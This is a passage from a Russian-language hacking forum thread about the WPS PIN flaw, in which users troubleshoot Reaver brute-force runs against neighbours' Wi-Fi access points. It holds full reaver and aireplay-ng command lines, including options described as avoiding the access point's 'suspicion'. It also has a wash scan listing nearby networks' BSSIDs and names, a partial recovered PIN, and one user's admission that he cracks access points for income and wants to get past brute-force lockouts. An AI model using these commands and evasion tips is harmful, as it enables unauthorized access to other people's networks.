Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. Buran

    Buran Elder - Старейшина

    Joined:
    25 Feb 2011
    Messages:
    1,206
    Likes Received:
    6,732
    Reputations:
    110
    На какой МАС меняли в интерфейсе mon0? Попробуйте вообще не менять МАС. Иногда помогает.
     
  2. pav087

    pav087 New Member

    Joined:
    15 Nov 2012
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    Изначально начался подбор на родном маке TL-WN7200ND, но дошел до 11% и все никак, тепер WARNING: Receive timeout occurred лезет и всё, хоть сначала подбирай или с последнего пина всеравно ошибки..:confused:
    Мак подставлял клиента, который ассоциировался на этой точке, но также пробовал запускать ривер с 2-x других wifi карт соответственно с разными маками, та же беда лезет, хотя на этих картах другие точки также ломались как и на TL-WN7200ND...
     
    #362 pav087, 20 Nov 2012
    Last edited: 20 Nov 2012
  3. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Спасибо за советы, но так и ничего не получается, при смене МАС с одними командами выдаёт [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    с другими- [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    и так 10 раз и ступор.
    Попробовал ещё одну точку, доходит до 90.90% при пине 99985677 и без конца повторяет. Запускал реавер снуля - то же, запускал этот пин-идёт всё по кругу. Но заметил, что сообщения идут только М1,М2,М3,М4, а М5 и М6 не было ни разу. Что это? Подскажите. Заранее спасибо.
     
  4. user_bad

    user_bad Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    94
    Likes Received:
    12
    Reputations:
    1
    второй случай имею на роутере NETGEAR и ничего не получается, как будто М5 вообще не бывает, переставлял цифирку подбор идет дальше но результата нет...
     
  5. pav087

    pav087 New Member

    Joined:
    15 Nov 2012
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    Отпишусь по своей проблеме - WARNING: Receive timeout occurred

    Отключили в доме свет не надолго, подбор пошел опять, видимо точка блокировалась, а после перезагрузки опять давала подобрать.
    PIN
    80:1F:02:06:x:x - 686018xx может кому пригодится...
     
  6. SubFear

    SubFear New Member

    Joined:
    25 Nov 2012
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    F1! F1! F1!

    BackTrack 5 R3 BlackHat

    root@bt:~# reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS --nack -t 10 --eap-terminate -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (coffee) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from 52:26:ED:8F:4D:E2
    [+] Associated with 52:26:ED:8F:4D:E2 (ESSID: HDS)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request

    root@bt:~# wash -i mon0 -C -s

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (coffee) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

    BSSID Channel RSSI WPS Version WPS Locked ESSID
    ---------------------------------------------------------------------------------------------------------------
    14:A9:E3:03:24:22 1 -84 1.0 No dmitriyconshin
    14:A9:E3:02:4B:3A 1 -81 1.0 No Domolink_451608_R_msk
    00:26:5A:31:D9:50 1 -86 1.0 No dlink
    C8:6C:87:41:25:1F 1 -76 1.0 No O_O
    50:67:F0:16:FE:3C 1 -87 1.0 No Andrey
    14:A9:E3:01:50:0E 1 -87 1.0 No DOMOLINK_FREEPORT_01500E
    B0:B2:DC:3C:7C:30 1 -86 1.0 No Domolink_532202_R_msk
    14:A9:E3:02:18:C6 3 -80 1.0 No DOMOLINK_FREEPORT_0218C6
    34:08:04:14:7C:BE 6 -86 1.0 No dlink
    20:CF:30:CE:10:59 11 -86 1.0 No mksbag

    пробовал включать aireplay-ng но как он должен работать я не в курсе. не помогло. я вообще в линуксе 0. пока иду на ощупь, с закрытыми глазами. помогите плз. может советом, может ссылочкой на мануальчик. сейчас думаю попробовать wifislax 4.2 final/ может он поможет. только какие там команды прописывать....

    та сетка которую я пытаюсь нагнуть имеет самый сильный сигнал. в wash она присутствует. просто в поле копирования не попала.

    кстати. я пробовал reaverom все сетки корячить. и у всех одно и тоже. ломанул только одну. с совершенно убогим сигналом. минут за 20.
     
    #366 SubFear, 27 Nov 2012
    Last edited: 27 Nov 2012
  7. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    3,709
    Likes Received:
    12,391
    Reputations:
    351
    Рекомендую прописать команду следующим образом:
    reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS -a -S -vv

    Подставляя опцию - S ( --dh-smal ) Reaver задает небольшое значение секретного ключа, тем самым облегчая расчеты на стороне точки.

    Опция -a, позволяет оптимизировать работу Reaver.

    Про доп опции к Reaver почитайте тут.
    Уверены, что на точке "HDS" включен WPS ?
    В приведенном вами списке wash её нет.
     
    _________________________
    #367 user100, 27 Nov 2012
    Last edited: 27 Nov 2012
    1 person likes this.
  8. SubFear

    SubFear New Member

    Joined:
    25 Nov 2012
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    вчера пробовал прописывать -vv --dh-small результат тот же.
    в списке wash она есть. просто точпадом не смог растянуть поле выделения на столько, чтобы она туда попала. я в линуксе вообще 0. 3 дня назад его первый раз увидел.
     
  9. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    3,709
    Likes Received:
    12,391
    Reputations:
    351
    Ошибки «timeout» могут возникать из за слабого сигнала Точки доступа.
     
    _________________________
  10. SubFear

    SubFear New Member

    Joined:
    25 Nov 2012
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    хороший сигнал по всей квартире. предполагаю что это ктото из соседей снизу либо сверху. у меня 1 с очень хорошим сигналом 3-4 с нормальным. и ещё 5-7 со слабым. вот одну со слабым я ломанул а с остальными такая вот засада.
     
    1 person likes this.
  11. Oxy

    Oxy New Member

    Joined:
    29 Nov 2012
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Взломал давно dir-615 c помощью dwa-510 + самопальная антенна, заняло около 10 суток, дак сейчас пароль хозяева сменили, а я пин забыл :D , точнее последние 4 цифры. Сейчас приспособил роутер с openwrt для этого дела. А вообще, плохи дела становятся с уязвимостью, почти все современные роутеры идут с отключенным wps. У меня из 15 сетей только 2 определяются как уязвимые.
     
  12. slavtan

    slavtan New Member

    Joined:
    26 Nov 2012
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    А у меня точки вырубаются! По началу ключики перебираются с нормальной скоростью, а после полусуток резко вырубаются с эфира! Пока на двух заметил, и без разницы после или до 90%.Третью взломал с редким названием KINEETIC, она сразу "отдалась" т.к. пин ее - все нули! Ну я от радости полез в админку роутера, оно естественно под паролем.После нескольких попыток точка исчезла с эфира! Сканил под wifislax. Удалось еще без осложнений вскрыть nrendnet.
    Пассы в 14 символов наверно не одним словарем радужным ни когда не подобрать.
     
    #372 slavtan, 3 Dec 2012
    Last edited: 3 Dec 2012
  13. denis839

    denis839 New Member

    Joined:
    4 Jul 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Добрый день.
    Сталкнулся с такой проблемкой:
    reaver перебирает ПИН, потом (процентов через 5 ) пишет что нет ассоциации с точкой. При проверке выясняется, что WPS отключается. Сигнал отличный. Когда выключают свет или выполняют перезагрузку точки WPS опять активен на следующие примерно 5% перебора.
    Пробовал менять MAC адрес адаптера на MAC адрес клиента - не помогло.
    Вопрос в следующем: как избежать отказа асоциации и отключения WPS и как заставить перезагрузиться точку после отключения WPS для дальнейшего его включения.

    P.S. накипело, нескем поделиться и посоветоваться: есть точки на которых включен WPS но при запуске reaver сканирует каналы, но ничего не происходит. С чем это связано?

    Заранее благодарен.
     
  14. ivans39

    ivans39 New Member

    Joined:
    20 Sep 2011
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Интересная функция позволяет приостановить перебор на определенное время после определенного количества попыток и затем его продолжить, не создавая лишнего “подозрения” у АР. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -r 8:20
     
  15. ivans39

    ivans39 New Member

    Joined:
    20 Sep 2011
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    1.Уровень сигнала 2.Reaver это все таки brut force и у кого то PIN начинался с 1111 а у кого то 9999 алгоритм работы reaver, сперва пины по default а затем по порядку. –S все таки полезная функция. 3.Защита на AP. Перезапуск с –vv а не просто -v дает более обширную информация что происходит с АР. У многих возникали вопросы по поводу reaver, вот не большой FAQ по материалам сети с небольшими комментами от меня. Думаю, он будет полезен. Почему возникают ошибки "timeout" и "out of order"? - Обычно это происходит из-за низкого уровня сигнала и плохой связи сточкой доступа. Кроме того, точка доступа может на время заблокировать использование WPS. Почему при плохом сигнале Reaver работает плохо, хотя тот же взлом WEP проходит нормально? - Взлом WEP происходит путем повторной пересылки перехваченных пакетов, чтобы получить векторы инициализации (IV), необходимых для успешного взлома. В этом случае неважно, потерялся какой-либо пакет, либо как-то был поврежден по пути. А вот для атаки на WPS необходимо строгое следование протоколу передачи пакетов между точкой доступа и Reaver для проверки каждого PIN-кода. Это делает атаки на WPS гораздо более зависимыми от уровня сигнала. Важно помнить, что если твой беспроводной адаптер видит точку доступа, то это ещё не значит, что и точка доступа видит тебя. Почему я постоянно получаю ошибки "rate limiting detected"? - Точка доступа заблокировала WPS. Обычно блокировка длится около пяти минут, но в некоторых случаях возможна полная “падение” АР - и только reset способен вернуть точку к “жизни”. Дополнительные опции, Reaver, которые могут повысить эффективность перебора ключа WPS. Можно задать номер канала -с и -е SSID точки доступа: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx (-S) '--dh-small' Полезная опция, которая задает небольшое значение PIN, тем самым облегчая работу reaver: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --dh-small (-t) --timeout Таймаут ожидания ответа по умолчанию равен пяти секундам. При необходимости его можно изменить: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -t 2 (-d) --delay Задержка между попытками по умолчанию равна одной секунде. Она также может быть настроена: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -d 5 (-l) --lock-delay Некоторые точки доступа могут блокировать WPS на определенное время. Reaver делает паузу в переборе на 315 секунд по умолчанию, длительность этой паузы можно менять: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --lock-delay=320 (-n) --nack Некоторые реализации протокола WPS разрывают соединение при неправильном PIN-коде, хотя по спецификации должны возвращать особое сообщение. Reaver автоматически распознает такую ситуацию, для этого существует опция: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --nаск' (-E) --eap-terminate. Опция предназначена для работы с теми АР, которые требуют завершения WPS-сессии с помощью сообщения ЕАР FAIL: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --eap-terminate (-L), --ignore-locks Игнорирование блокировки WPS-сессии. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --ignore-locks (-x) --fail-wait. Возникновение ошибок в WPS-сессии может означать, что АР ограничивает число попыток ввода PIN-кода, либо просто перегружена запросами. В этом случае Reaver приостанавливает свою деятельность после 10 попыток, на установленную временную паузу. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --fail-wait=360 (-T), --m57-timeout Установка интервала времени для M5/M7 - иногда помогает. По умолчанию 0.1 возможно увеличение до 1 сек. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -T .5 (-A), --no-associate. Отмена авторизации на АР, немного ускоряет процесс перебора PIN. reaver -i mon0 -А -b 00:00:00:00:00:00 -с 11 -е xxxxxx Авторизация должна быть запущенна отдельно. aireplay-ng mon0 -1 120 -a 00:00:00:00:00:00 -е xxxxxx (-p), --pin Если PIN уже подобран - иногда помогает увидеть WPA в “нормальном” виде (не НЕХ). Или возможен перебор сразу с установленного интервала, если вы уверены что ваш PIN начинается, скажем, с 3000. А также для теста. (Значение 4 или 8 цифр). reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --pin 3000 (-g), --max-attempts и -w, --win7. Здесь думаю объяснять не нужно. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx –w –g 15 -r, --recurring-delay Интересная функция позволяет приостановить перебор на определенное время после определенного количества попыток и затем его продолжить, не создавая лишнего “подозрения” у АР. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -r 8:20
     
  16. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    (-g), --max-attempts и -w, --win7. Здесь думаю объяснять не нужно. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx –w –g 15- почему объяснять не нужно, думаю, не все это знают, например я. Объясните п ж. Спасибо.
     
  17. Dovbnyak

    Dovbnyak New Member

    Joined:
    28 Dec 2010
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Привет всем Видел много тем что много кто не мог установить WPScrsck gui решил помочь ) для начала качаем саму сборку ) http://sourceforge.net/projects/wpscrackgui/files/Ubuntu/ если у вас сборка Gnome сам ею пользуюсь то откроем консоль и введем воттакое dpkg -i копируем имя файла которий скачали и вставляем в моем слусае ето wpscrackgui_1.1.8-1_ubuntu.deb будет примерно так dpkg -i wpscrackgui_1.1.8-1_ubuntu.deb жмем ентер и ждем окончания потом пишем apt -get -f install спросит y/n берем y и ждем настройки и все готово можно пользоваться програмой ) она находится в подменю Internet )

    1. dpkg -i wpscrackgui_1.1.8-1_ubuntu.deb
    2. apt -get -f install
    И радуемся что унас все получилось )
     
  18. Dovbnyak

    Dovbnyak New Member

    Joined:
    28 Dec 2010
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    И еще сам довольно часто ломаю в барселоне AP так сказать на етом подрабативаю иногда приходится довольно часто наблюдать перебор одного и тогоже пароля типа 12345670 и ступор хотя по логу видно что все ок нак шлет итд.... подставлял разние функц... ничего не помагает откатил на 1.3 вроде все пошло но после 10или дааже больше пинов идет warning receive timeout occurred . Но WPS не блочит я так понял что точка делает паузу пробовал делать таймаут на 10-30 сек после 4 пинов после 6 ничего не омогло продержалось немного и потом опять лепит warning receive timeout occurred приходится все запускать по новой и + не удобно имя AP ORANGE знаю что в етих роутерах уже стояла защита от брута даже раньше всех но старие коробочки иногда здаются после бомбардировок MDK3 можно ли както обойти ету редиску ?
     
  19. Dovbnyak

    Dovbnyak New Member

    Joined:
    28 Dec 2010
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Что тут не понятно -w значит что reaver будет посилать мимики ввода pin как у Windows7 тем самим скроет подозрения брута ! :) Ну а g 15 если мне не врет память то ето время после которого будет произведена проба следуищего пароля чтоб не лепило 3 парося в сек ставим 15 сек и оно будет вводить пароль каждие 15 сек Или наоборот ето команда -d задает ето время влюбом случае они похожи между собой )
     
    #379 Dovbnyak, 10 Dec 2012
    Last edited: 10 Dec 2012
  20. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Всем привет,уважаемые форумчане. Не однократно читал, про откат reaver на версию 1.3 и это помогает. Я использую BT5R3 gnome загрузочный. Там можно откатить? Если да-то как? Заранее спасибо.
     
Loading...